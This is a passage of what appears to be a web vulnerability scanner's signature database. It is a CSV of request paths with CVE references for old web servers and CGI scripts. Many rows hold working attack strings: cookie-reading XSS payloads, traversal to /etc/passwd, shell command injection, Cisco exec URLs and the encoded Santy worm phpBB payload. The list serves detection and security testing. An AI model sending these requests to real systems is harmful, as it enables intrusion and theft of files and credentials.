"001240","CVE-2005-0548","4","/ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Sun Answerbook is vulnerable to XSS in the search field.","","" "001241","CVE-2002-1785","4","/apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS).","","" "001243","OSVDB-2117","b","/BACLIENT","GET","200","","","","","IBM Tivoli default file found.","","" "001244","CWE-552","1b","/postinfo.html","GET","Web Publishing Information","","","","","Microsoft FrontPage default file found.","","" "001245","CVE-2006-5601","3b","/na_admin/ataglance.html","GET","Filer At","","","","","NetApp application displays detailed system information.","","" "001246","CVE-2000-0097 MS00-006","7","/scripts/samples/search/qfullhit.htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval.","","" "001247","CVE-2000-0097 MS00-006","7","/scripts/samples/search/qsumrhit.htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval.","","" "001248","CVE-2000-0097 MS00-006","7","/JUNK(5).htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed.","","" "001251","CVE-2001-0374","28a","http://127.0.0.1:2301/%20HTTP/1.0","GET","Compaq WBEM Device","","","","","The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass.","","" "001252","OSVDB-847","37","/file/../../../../../../../../etc/","GET","passwd","","hosts","","","The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.","","" "001253","CVE-2001-0537","8","/level/16/exec/-///pwd","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001254","CVE-2001-0537","8","/level/16/exec/-///show/configuration","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001255","CVE-2001-0537","8","/level/16","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001256","CVE-2001-0537","8","/level/16/exec/","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001257","CVE-2001-0537","8","/level/16/exec//show/access-lists","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001258","CVE-2001-0537","8","/level/16/level/16/exec//show/configuration","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001259","CVE-2001-0537","8","/level/16/level/16/exec//show/interfaces","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001260","CVE-2001-0537","8","/level/16/level/16/exec//show/interfaces/status","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001261","CVE-2001-0537","8","/level/16/level/16/exec//show/version","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001262","CVE-2001-0537","8","/level/16/level/16/exec//show/running-config/interface/FastEthernet","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001263","CVE-2001-0537","8","/level/16/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001264","CVE-2001-0537","8","/level/17/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001265","CVE-2001-0537","8","/level/18/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001266","CVE-2001-0537","8","/level/19/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001267","CVE-2001-0537","8","/level/20/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001268","CVE-2001-0537","8","/level/21/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001269","CVE-2001-0537","8","/level/22/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001270","CVE-2001-0537","8","/level/23/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001271","CVE-2001-0537","8","/level/24/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001272","CVE-2001-0537","8","/level/25/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001273","CVE-2001-0537","8","/level/26/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001274","CVE-2001-0537","8","/level/27/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001275","CVE-2001-0537","8","/level/28/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001276","CVE-2001-0537","8","/level/29/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001277","CVE-2001-0537","8","/level/30/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001278","CVE-2001-0537","8","/level/31/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001279","CVE-2001-0537","8","/level/32/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001280","CVE-2001-0537","8","/level/33/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001281","CVE-2001-0537","8","/level/34/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001282","CVE-2001-0537","8","/level/35/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001283","CVE-2001-0537","8","/level/36/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001284","CVE-2001-0537","8","/level/37/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001285","CVE-2001-0537","8","/level/38/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001286","CVE-2001-0537","8","/level/39/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001287","CVE-2001-0537","8","/level/40/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001288","CVE-2001-0537","8","/level/41/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001289","CVE-2001-0537","8","/level/42/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001290","CVE-2001-0537","8","/level/43/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001291","CVE-2001-0537","8","/level/44/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001292","CVE-2001-0537","8","/level/45/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001293","CVE-2001-0537","8","/level/46/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001294","CVE-2001-0537","8","/level/47/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001295","CVE-2001-0537","8","/level/48/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001296","CVE-2001-0537","8","/level/49/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001297","CVE-2001-0537","8","/level/50/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001298","CVE-2001-0537","8","/level/51/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001299","CVE-2001-0537","8","/level/52/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001300","CVE-2001-0537","8","/level/53/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001301","CVE-2001-0537","8","/level/54/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001302","CVE-2001-0537","8","/level/55/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001303","CVE-2001-0537","8","/level/56/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001304","CVE-2001-0537","8","/level/57/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001305","CVE-2001-0537","8","/level/58/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001306","CVE-2001-0537","8","/level/59/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001307","CVE-2001-0537","8","/level/60/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001308","CVE-2001-0537","8","/level/61/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001309","CVE-2001-0537","8","/level/62/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001310","CVE-2001-0537","8","/level/63/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001311","CVE-2001-0537","8","/level/64/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001312","CVE-2001-0537","8","/level/65/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001313","CVE-2001-0537","8","/level/66/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001314","CVE-2001-0537","8","/level/67/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001315","CVE-2001-0537","8","/level/68/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001316","CVE-2001-0537","8","/level/69/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001317","CVE-2001-0537","8","/level/70/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001318","CVE-2001-0537","8","/level/71/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001319","CVE-2001-0537","8","/level/72/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001320","CVE-2001-0537","8","/level/73/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001321","CVE-2001-0537","8","/level/74/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001322","CVE-2001-0537","8","/level/75/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001323","CVE-2001-0537","8","/level/76/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001324","CVE-2001-0537","8","/level/77/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001325","CVE-2001-0537","8","/level/78/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001326","CVE-2001-0537","8","/level/79/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001327","CVE-2001-0537","8","/level/80/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001328","CVE-2001-0537","8","/level/81/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001329","CVE-2001-0537","8","/level/82/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001330","CVE-2001-0537","8","/level/83/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001331","CVE-2001-0537","8","/level/84/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001332","CVE-2001-0537","8","/level/85/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001333","CVE-2001-0537","8","/level/86/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001334","CVE-2001-0537","8","/level/87/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001335","CVE-2001-0537","8","/level/88/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001336","CVE-2001-0537","8","/level/89/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001337","CVE-2001-0537","8","/level/90/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001338","CVE-2001-0537","8","/level/91/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001339","CVE-2001-0537","8","/level/92/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001340","CVE-2001-0537","8","/level/93/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001341","CVE-2001-0537","8","/level/94/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001342","CVE-2001-0537","8","/level/95/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001343","CVE-2001-0537","8","/level/96/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001344","CVE-2001-0537","8","/level/97/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001345","CVE-2001-0537","8","/level/98/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001346","CVE-2001-0537","8","/level/99/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","","" "001347","CVE-2002-1412","c","/gallery/captionator.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","","" "001348","CVE-2002-1412","c","/gallery/errors/configmode.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","","" "001350","CVE-2002-1412","c","/gallery/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","","" "001351","CVE-2002-1412","c","/gallery/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","","" "001352","CVE-2002-1353","3","/users.lst","GET","200","","","","","LocalWEB2000 users.lst passwords found","","" "001353","OSVDB-13405","23","/WS_FTP.LOG","GET","200","","","","","WS_FTP.LOG file was found. It may contain sensitive information.","","" "001354","CVE-2001-1045","7","/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu","GET","root:","","","","","Remote file retrieval.","","" "001355","CVE-2004-2104","23","/examples/jsp/snp/snoop.jsp","GET","Request Information","","","","","Displays information about page retrievals, including other users.","","" "001356","CVE-2004-2104","23","/nsn/env.bas","GET","200","","","","","Novell web server shows the server environment and is vulnerable to cross-site scripting","","" "001357","CVE-2004-2104","23","/lcgi/lcgitest.nlm","GET","200","","","","","Novell web server shows the server environment","","" "001358","CVE-2004-2106","2","/com/","GET","200","","","","","Novell web server allows directory listing","","" "001359","CVE-2004-2106","2","/com/novell/","GET","200","","","","","Novell web server allows directory listing","","" "001360","CVE-2004-2106","2","/com/novell/webaccess","GET","200","","","","","Novell web server allows directory listing","","" "001361","CVE-2004-1607","18","@CGIDIRS","GET","match","","","","","CGI Directory found","","" "001362","CVE-2004-2047","7","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc","GET","passwd","","","","","EW FileManager for PostNuke allows arbitrary file retrieval.","","" "001363","CVE-2004-2047","7","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd","GET","root:","","","","","EW FileManager for PostNuke allows arbitrary file retrieval.","","" "001364","","1","@CGIDIRSccbill-local.pl?cmd=MENU","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001365","","1","@CGIDIRSccbill-local.cgi?cmd=MENU","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001366","","1","@CGIDIRSmastergate/search.cgi?search=0&search_on=all","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001367","","1","@CGIDIRSBackup/add-passwd.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001368","CVE-2001-0930","8","@CGIDIRSsendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message","GET","passwd","","","","","sendpage.pl allows command execution via the message variable.","","" "001369","CVE-2000-1131","8","@CGIDIRSgbook/gbook.cgi?_MAILTO=xx;ls","GET","200","","","","","gbook.cgi allows command execution.","","" "001370","CVE-2001-0100","8","@CGIDIRSbslist.cgi?email=x;ls","GET","200","","","","","BSList allows command execution.","","" "001371","CVE-2001-0099","8","@CGIDIRSbsguest.cgi?email=x;ls","GET","200","","","","","BSGuest allows command execution.","","" "001372","CVE-2004-2732","3","@CGIDIRSnbmember.cgi?cmd=list_all_users","GET","OK: Listing","","","","","Netbilling ndmember.cgi reveals sensitive information.","","" "001373","CVE-2003-0240","a","//admin/admin.shtml","GET","200","","","","","Axis network camera may allow admin bypass by using double-slashes before URLs.","","" "001374","https://www.securityfocus.com/archive/1/313485","70","/axis-cgi/buffer/command.cgi","GET","200","","","","","Axis WebCam 2400 may allow overwriting or creating files on the system.","","" "001375","https://www.securityfocus.com/archive/1/313485","3","/support/messages","GET","200","","","","","Axis WebCam allows retrieval of messages file (/var/log/messages).","","" "001376","","8","@CGIDIRSwhere.pl?sd=ls%20/etc","GET","passwd","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001377","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","23","@CGIDIRS","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001378","OSVDB-12606","4","/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001379","OSVDB-12607","4","/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001380","OSVDB-12606","4","/bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001381","OSVDB-12607","4","/bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001382","OSVDB-12606","4","/eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001383","OSVDB-12607","4","/eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" "001384","OSVDB-12184","3","/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000","GET","phpinfo","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" "001385","OSVDB-12184","3","/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42","GET","GIF89a","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" "001386","OSVDB-12184","3","/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42","GET","GIF89a","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" "001387","OSVDB-12184","3","/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42","GET","GIF89a","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" "001388","CVE-2004-1315","89","/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001389","CVE-2004-1315","89","/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001390","CVE-2004-1315","89","@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001391","CVE-2004-1315","89","@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001392","CVE-2004-1315","89","@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001393","CVE-2004-1315","89","/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001394","CVE-2004-1315","89","/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001395","CVE-2004-1315","89","/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001396","CVE-2004-1315","89","/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001397","CVE-2004-1315","89","@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001398","CVE-2004-1315","89","@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001399","CVE-2004-1315","89","@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001400","CVE-2004-1315","89","/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","","" "001401","CVE-1999-0067","8","@CGIDIRSphf?Qname=root%0Acat%20/etc/passwd%20","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "001402","CVE-1999-0067","8","@CGIDIRSphf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "001403","CVE-1999-0067","8","@CGIDIRSphf","GET","200","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "001404","OSVDB-228","0","@CGIDIRSupload.cgi","GET","200","","","","","The upload.cgi allows attackers to upload arbitrary files to the server.","","" "001405","OSVDB-228","0","/upload.cgi+","GET","200","","","","","The upload.cgi allows attackers to upload arbitrary files to the server.","","" "001406","OSVDB-561","3","/server-status","GET","200","Server Version","","","","This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.","","" "001407","CVE-1999-0269","3","/?PageServices","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled.","","" "001408","CVE-1999-0269","3","/?wp-cs-dump","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled.","","" "001409","CVE-2000-0057","3","/cfdocs.map","GET","\.tmp","","","","","Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information.","","" "001410","CVE-2000-0237","b","/publisher/","GET","200","","","","","Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet.","","" "001411","CVE-1999-1177","8","@CGIDIRSnph-publish.cgi","GET","200","","","","","This CGI may allow attackers to execute arbitrary commands on the server.","","" "001412","CVE-1999-0045","3","@CGIDIRSnph-test-cgi","GET","200","","","","","This CGI lets attackers get a directory listing of the CGI directory.","","" "001413","CVE-1999-0270","7","/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd","GET","root:","","","","","This CGI lets attackers get a directory listing of the CGI directory.","","" "001414","CVE-1999-0270","7","@CGIDIRSpfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'","GET","root:","","","","","This allows attackers to execute arbitrary commands on the host.","","" "001415","CVE-1999-0270","7","@CGIDIRSpfdispaly.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the host.","","" "001416","CVE-1999-0270","7","@CGIDIRSpfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'","GET","root:","","","","","This allows attackers to execute arbitrary commands on the host.","","" "001417","OSVDB-155","6","/counter/1/n/n/0/3/5/0/a/123.gif","GET","200","","","","","The Roxen Counter may eat up excessive CPU time with image requests.","","" "001418","CVE-1999-0449","6","/iissamples/exair/search/search.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server.","","" "001419","CVE-2001-1502","7","@CGIDIRSwebcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD","GET","root:","","","","","webcart.cgi allows remote command execution. Upgrade to the latest version.","","" "001420","OSVDB-2091","5","/../webserver.ini","GET","Authentic=","","","","","Nuca WebServer allows retrieval of the web server configuration.","","" "001421","OSVDB-2117","2","/","GET","ESS Launch","","","","","Default IBM TotalStorage server found.","","" "001422","OSVDB-2117","2","/na_admin/","GET","Network Appliance","","","","","Default Network Appliance server found.","","" "001423","OSVDB-2117","2","/","GET","Celerra Web Manager","","","","","Default EMC Cellera manager server is running.","","" "001424","OSVDB-2117","2","/","GET","EMC ControlCenter","","","","","Default EMC ControlCenter manager server is running.","","" "001425","OSVDB-2117","2","/cpqlogin.htm","GET","System Management Homepage","","","","","Default Compaq/HP WBEM server is running.","","" "001426","OSVDB-2117","2","/cpqlogin.htm","GET","This is a private system","","","","","Default Compaq/HP WBEM server is running.","","" "001427","OSVDB-2117","2","/","GET","DHost HTTP Server","","","","","Default Novell NDS iMonitor was found. Default account may be 'sadmin' with no password.","","" "001428","OSVDB-2117","2","/","GET","AnswerBook","","","","","Default Sun Answerbook server running.","","" "001429","OSVDB-2117","2","/","GET","Allaire Corporateion","","","","","Default JRun 2 server running.","","" "001430","OSVDB-2117","2","/","GET","Cisco IP Phone","","","","","Cisco VoIP Phone default web server found.","","" "001431","OSVDB-2117","2","/","GET","Jaguar CTS","","","","","Default Sybase Jaguar CTS server running.","","" "001432","OSVDB-2117","2","/","GET","Jrun Management Console","","","","","Default JRun 3 server running.","","" "001433","OSVDB-2117","2","/","GET","Lantronix","","","","","Default Lantronix printer found.","","" "001434","OSVDB-2117","2","/","GET","Storage Management","","","","","Default IBM Tivoli Server Administration server is running.","","" "001435","OSVDB-2117","2","/","GET","Welcome to the JMC","","","","","Default JRun 4 server running.","","" "001436","OSVDB-2117","2","/","GET","XEROX WORKCENTRE","","","","","Default Xerox WorkCentre server is running.","","" "001437","OSVDB-2117","2","/","GET","body text=\"#000000\" bgcolor=\"#000000\" style=","","","","","Appears to be a default Domino 6 install.","","" "001438","OSVDB-2117","2","/","GET","Domino 5","","","","","Default Lotus Domino server running.","","" "001439","OSVDB-2117","2","/","GET","<TITLE>Sambar Server<\/TITLE>","","","","","Appears to be a default Sambar install.","","" "001441","OSVDB-2117","2","/","GET","\(\?:default Tomcat\|instead of the website\)","","","","","Appears to be a default Apache install.","","" "001442","OSVDB-2117","2","/","GET","Test Page for Apache","","","","","Appears to be a default Apache install.","","" "001443","OSVDB-2117","2","/","GET","The site you were trying to reach does not currently have a default page","","","","","Appears to be a default IIS install.","","" "001444","OSVDB-2117","2","/","GET","Welcome to IIS 4\.0","","","","","Appears to be a default IIS 4.0 install.","","" "001445","OSVDB-2117","2","/","GET","Welcome to Microsoft Windows NT 4","","","","","Appears to be a default IIS install.","","" "001446","OSVDB-2117","2","/","GET","Web Server, Enterprise Edition 6\.0","","","","","Appears to be a default Netscape/iPlanet 6 install.","","" "001447","OSVDB-2117","b","/main_page.php","GET","mazu\.css","","","","","Mazu 